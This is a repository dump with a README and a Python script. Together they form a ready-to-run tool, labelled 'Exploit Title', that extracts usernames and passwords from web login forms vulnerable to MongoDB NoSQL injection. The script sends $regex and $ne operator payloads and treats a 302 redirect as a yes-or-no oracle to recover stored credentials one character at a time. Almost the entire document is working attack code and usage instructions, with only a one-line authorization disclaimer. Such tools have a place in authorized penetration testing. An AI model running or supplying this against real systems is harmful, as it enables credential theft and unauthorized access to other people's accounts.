Repository: an0nlk/Nosql-MongoDB-injection-username-password-enumeration
Branch: master
Commit: 1b3713ab2221
Files: 2
Total size: 5.2 KB
Directory structure:
gitextract_240q6mjc/
├── README.md
└── nosqli-user-pass-enum.py
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# Nosql injection username and password enumeration script
Using this script, we can enumerate the usernames and passwords of web applications vulnerable to NoSQL (MongoDB) injection. The script treats an HTTP 302 redirect as a successful login, so the target form must redirect only on valid credentials. Only run it against systems you are explicitly authorized to test.
Exploit Title: Nosql injection username/password enumeration.
Author: Kalana Sankalpa (Anon LK).
Website: https://blogofkalana.wordpress.com/2019/11/14/nosql-injection-username-and-password-enumeration/
## How to run
### Usage
```
nosqli-user-pass-enum.py [-h] [-u URL] [-up parameter] [-pp parameter] [-op parameters] [-ep parameter] [-sc character] [-m Method]
```
### Example
```
python nosqli-user-pass-enum.py -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit
```
### Arguments
| Arguments | Description |
| ------------- |:-------------:|
| -h, --help | show this help message and exit |
| -u URL | Form submission url. Eg: http://example.com/index.php |
| -up parameter | Parameter name of the username. Eg: username, user |
| -pp parameter | Parameter name of the password. Eg: password, pass |
| -op parameters | Other parameters with their values. Separate each parameter with a comma (,). Eg: login:Login,submit:Submit |
| -ep parameter | Parameter that needs to be enumerated; must be the same name given to -up or -pp. Eg: username, password |
| -m Method | Method of the form. Eg: GET/POST (defaults to POST when omitted) |



================================================
FILE: nosqli-user-pass-enum.py
================================================
#!/usr/bin/env python3
# Exploit Title: Nosql injection username/password enumeration
# Author: Kalana Sankalpa (Anon LK)
# Websites: https://www.widane.com, https://blogofkalana.wordpress.com
# Blogpost: https://blogofkalana.wordpress.com/2019/11/14/nosql-injection-username-and-password-enumeration/
import argparse
import re
import string
import sys

import requests
from colorama import Fore, Style
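# HTTP status the vulnerable form answers with on a successful login. The whole
# enumeration is a boolean oracle on this status: a redirect means the injected
# query matched a stored credential, anything else means it did not.
DEFAULT_SUCCESS_STATUS = 302
# Seconds to wait for each request; without a timeout a stalled target hangs
# the run forever.
DEFAULT_TIMEOUT = 10.0
# Candidate characters. Every candidate is passed through re.escape() before it
# is placed in the regex, so metacharacters such as ( ) [ ] { } $ . * can be
# probed too. The previous blacklist left ( ) [ ] { } unescaped, which produced
# invalid regexes (and therefore false negatives) for those characters. Values
# containing characters outside this alphabet are recovered only up to the
# first such character.
ALPHABET = string.printable


def _colored(color, text):
    """Return ``text`` in a colorama colour, resetting afterwards so the colour
    does not bleed into the rest of the terminal session."""
    return color + text + Style.RESET_ALL


def _fail(message, code=1):
    """Print ``message`` in red on stderr and exit with a non-zero status.

    Exiting with 0 on errors (as the script used to) hides failures from shell
    wrappers and CI.
    """
    sys.stderr.write(_colored(Fore.RED, message) + "\n")
    sys.exit(code)


def parse_other_params(spec):
    """Turn the ``-op`` value (``"login:Login,submit:Submit"``) into a dict.

    Entries are comma-separated ``name:value`` pairs. Whitespace around an
    entry is ignored, empty entries are skipped, and only the first ``:``
    splits name from value so a value may itself contain colons. An entry
    without ``:`` is sent with an empty value. ``None``/``""`` give ``{}``.

    These fields used to be appended as text to the ``[$ne]`` value instead of
    being sent as separate form fields, so the form never saw them.
    """
    params = {}
    if not spec:
        return params
    for entry in spec.split(","):
        entry = entry.strip()
        if not entry:
            continue
        name, _, value = entry.partition(":")
        params[name.strip()] = value
    return params


def prefix_regex(text):
    """MongoDB regex matching any stored value that starts with ``text``.

    ``re.escape`` only ever backslash-escapes non-alphanumeric characters, and
    PCRE (MongoDB's regex engine) treats a backslash before a non-alphanumeric
    as that literal character, so the escaped form is safe on both sides.
    """
    return "^" + re.escape(text) + ".*"


def exact_regex(text):
    """MongoDB regex matching only the stored value equal to ``text``."""
    return "^" + re.escape(text) + "$"


def build_payload(target, other, regex, extra):
    """Form fields for one oracle query.

    ``target`` is the parameter being enumerated: it is sent as
    ``target[$regex]=regex``. ``other`` is the companion credential field, sent
    as ``other[$ne]=1`` so it matches any stored value (except the literal
    string ``"1"``). The injection relies on the server turning the ``name[op]``
    syntax into a nested operator object that reaches the MongoDB query
    unsanitised (PHP's query-string array parsing, for example). ``extra``
    holds the remaining form fields from ``-op``; the operator-suffixed names
    are added last so they cannot be shadowed.
    """
    payload = dict(extra)
    payload[target + "[$regex]"] = regex
    payload[other + "[$ne]"] = "1"
    return payload


def enumerate_values(oracle, alphabet, log=None):
    """Recover every stored value of the enumerated field, one character at a time.

    ``oracle(regex)`` must return True exactly when the injected login
    succeeds for that MongoDB regex. ``alphabet`` is the set of candidate
    characters. ``log(kind, message)``, when given, receives progress messages
    with ``kind`` being ``"miss"``, ``"root"`` or ``"step"``.

    Every first character is probed, then each matching prefix is extended
    depth-first until no character in ``alphabet`` extends it. All branches
    are kept, so several values sharing a prefix (``alice``/``albert``) are
    all found; the previous greedy walk followed only one of them. A prefix
    that is extensible and also a complete value (``abc`` next to ``abcd``) is
    detected with one extra exact-match probe.

    Yields each completed value as soon as it is known, in discovery order.
    Each probe is one HTTP request, so the cost is roughly
    ``len(alphabet) * total recovered length``.
    """
    if log is None:
        def log(kind, message):
            pass

    roots = []
    for first in alphabet:
        if oracle(prefix_regex(first)):
            log("root", "Pattern found that starts with '%s'" % first)
            roots.append(first)
        else:
            log("miss", "No pattern starts with '%s'" % first)

    # Explicit stack rather than recursion: depth equals the value length.
    # Reversing keeps alphabet order for the values that get reported.
    pending = list(reversed(roots))
    while pending:
        prefix = pending.pop()
        longer = [prefix + ch for ch in alphabet if oracle(prefix_regex(prefix + ch))]
        for candidate in longer:
            log("step", "Pattern found: " + candidate)
        if not longer:
            # Nothing extends it: a complete value (within ``alphabet``).
            yield prefix
            continue
        # The prefix may be a full value as well as the start of longer ones.
        if oracle(exact_regex(prefix)):
            yield prefix
        pending.extend(reversed(longer))


def make_oracle(url, use_get, target, other, extra, timeout, success_status):
    """Build the ``regex -> bool`` oracle consumed by :func:`enumerate_values`.

    Each call submits one login attempt to ``url`` (query string when
    ``use_get`` is true, otherwise a POST form body), never follows redirects,
    and reports success when the response status equals ``success_status``.
    ``timeout`` bounds every request. A transport error aborts the run with a
    message instead of a traceback.
    """
    def oracle(regex):
        payload = build_payload(target, other, regex, extra)
        try:
            if use_get:
                response = requests.get(url, params=payload, allow_redirects=False, timeout=timeout)
            else:
                response = requests.post(url, data=payload, allow_redirects=False, timeout=timeout)
        except requests.exceptions.RequestException as exc:
            _fail("Error: request to %s failed: %s" % (url, exc))
        return response.status_code == success_status
    return oracle


def build_parser():
    """Command-line interface; option names match the README."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", action="store", metavar="URL",
                        help="Form submission url. Eg: http://example.com/index.php")
    parser.add_argument("-up", action="store", metavar="parameter",
                        help="Parameter name of the username. Eg: username, user")
    parser.add_argument("-pp", action="store", metavar="parameter",
                        help="Parameter name of the password. Eg: password, pass")
    parser.add_argument("-op", action="store", metavar="parameters",
                        help="Other parameters with their values, separated by commas. Eg: login:Login,submit:Submit")
    parser.add_argument("-ep", action="store", metavar="parameter",
                        help="Parameter to enumerate; must equal the -up or -pp name. Eg: username, password")
    parser.add_argument("-m", action="store", metavar="Method",
                        help="Method of the form. Eg: GET/POST (default: POST)")
    parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT, metavar="seconds",
                        help="Per-request timeout in seconds (default: %(default)s)")
    parser.add_argument("--success-status", type=int, default=DEFAULT_SUCCESS_STATUS, metavar="code",
                        help="HTTP status the form returns on a successful login (default: %(default)s)")
    return parser


def main(argv=None):
    """Entry point: validate options, run the enumeration, print the results.

    ``argv`` defaults to ``sys.argv[1:]``. Returns the process exit status;
    option errors exit with 2 via :func:`_fail`, like argparse itself.
    """
    argv = sys.argv[1:] if argv is None else list(argv)
    parser = build_parser()
    if not argv:
        # print_help() writes and returns None; the old code printed that None.
        parser.print_help(sys.stderr)
        sys.stderr.write(_colored(
            Fore.YELLOW,
            "\nExample: python " + sys.argv[0]
            + " -u http://example.com/index.php -up username -pp password -ep username"
            + " -op login:login,submit:submit -m POST") + "\n")
        return 0
    args = parser.parse_args(argv)

    if not args.u:
        _fail("Error: please enter URL with -u.", 2)
    if not args.up:
        _fail("Error: please enter User Parameter with -up.", 2)
    if not args.pp:
        _fail("Error: please enter Password Parameter with -pp.", 2)
    if not args.ep:
        _fail("Error: please enter the Parameter that need to enumerate with -ep.", 2)
    # The enumerated field gets the $regex probe; the other one gets $ne.
    if args.ep == args.up:
        target, other = args.up, args.pp
    elif args.ep == args.pp:
        target, other = args.pp, args.up
    else:
        _fail("Error: please enter the valid parameter that need to enumerate (-ep must equal -up or -pp)", 2)

    if not args.m:
        print(_colored(Fore.YELLOW, "Warning: No method given. Using POST as the method. (You can give the method with -m)"))
        use_get = False
    elif args.m[0] in "pP":
        use_get = False
    elif args.m[0] in "gG":
        use_get = True
    else:
        _fail("Error: Invalid method", 2)

    oracle = make_oracle(args.u, use_get, target, other, parse_other_params(args.op),
                         args.timeout, args.success_status)
    colors = {"miss": Fore.MAGENTA, "root": Fore.GREEN, "step": Fore.YELLOW}

    def log(kind, message):
        print(_colored(colors[kind], message))

    found = []
    for value in enumerate_values(oracle, ALPHABET, log):
        print(_colored(Fore.GREEN, target + " found: " + value))
        found.append(value)

    if found:
        print("\n%d %s(s) found:" % (len(found), target))
        print(_colored(Fore.RED, "\n".join(found)))
    else:
        print(_colored(Fore.RED, "No " + target + " found"))
    return 0


if __name__ == "__main__":
    sys.exit(main())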